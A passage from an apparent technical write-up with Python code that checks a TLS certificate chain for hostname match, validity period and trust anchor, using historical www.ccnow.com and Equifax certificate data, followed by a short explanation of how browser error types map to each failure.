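    label and stands for exactly one label (*.example.com matches
    www.example.com but neither example.com nor a.b.example.com)."""
    pattern, host = pattern.lower().rstrip("."), host.lower().rstrip(".")
    if pattern == host:
        return True
    p_labels, h_labels = pattern.split("."), host.split(".")
    if p_labels[0] != "*" or len(p_labels) < 3 or len(p_labels) != len(h_labels):
        return False
    return p_labels[1:] == h_labels[1:]


def evaluate(chain: List[Cert], host: str, trusted: Set[str], now: datetime) -> List[str]:
    """chain[0] is the server certificate, followed by any intermediates.
    Returns the list of failed conditions; an empty list means all three hold."""
    problems = []
    if not hostname_matches(chain[0].subject, host):
        problems.append(f"name mismatch: certificate is for {chain[0].subject}, host is {host}")
    for cert in chain:
        if not cert.not_before <= now <= cert.not_after:
            problems.append(f"{cert.subject}: not valid at {now.isoformat()}")
    # Walk issuers until one is a trust anchor; every link must be presented.
    for i, cert in enumerate(chain):
        if cert.issuer in trusted:
            break
        nxt = chain[i + 1] if i + 1 < len(chain) else None
        if nxt is None or nxt.subject != cert.issuer:
            problems.append(f"chain ends at {cert.subject} without reaching a trusted anchor")
            break
    return problems


# Certificate data as printed in issue 27.
SERVER = Cert("www.ccnow.com", "Equifax Secure Certificate Authority",
              datetime(2008, 6, 2, 16, 46, 17, tzinfo=CDT),
              datetime(2012, 8, 1, 16, 46, 17, tzinfo=CDT))
EQUIFAX = Cert("Equifax Secure Certificate Authority", "Equifax Secure Certificate Authority",
               datetime(1998, 8, 22, 11, 41, 51, tzinfo=CDT),
               datetime(2018, 8, 22, 11, 41, 51, tzinfo=CDT))
TRUSTED = {"Equifax Secure Certificate Authority"}     # assumed root store
SCAN_TIME = datetime(2011, 5, 9, 9, 36, 16, tzinfo=CDT)  # report timestamp


def demo() -> dict:
    """The chain as scanned, then the same chain under conditions that break each rule."""
    chain = [SERVER, EQUIFAX]
    return {
        "at_scan": evaluate(chain, "www.ccnow.com", TRUSTED, SCAN_TIME),
        "after_expiry": evaluate(chain, "www.ccnow.com", TRUSTED,
                                 SERVER.not_after + timedelta(days=1)),
        "wrong_host": evaluate(chain, "ccnow.com", TRUSTED, SCAN_TIME),
        "untrusted_root": evaluate(chain, "www.ccnow.com", set(), SCAN_TIME),
    }


if __name__ == "__main__":
    for case, problems in demo().items():
        print(case, "->", problems or ["valid"])
```

At the report's timestamp all three conditions hold, which is what the scanner recorded. The same chain evaluated one day after the server certificate's "Valid to" date fails only on the date, a request for the bare apex name fails only on the hostname, and an empty trust store fails only on the chain; the separation is what makes a browser's error message (expired versus wrong name versus unknown issuer) meaningful during triage.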
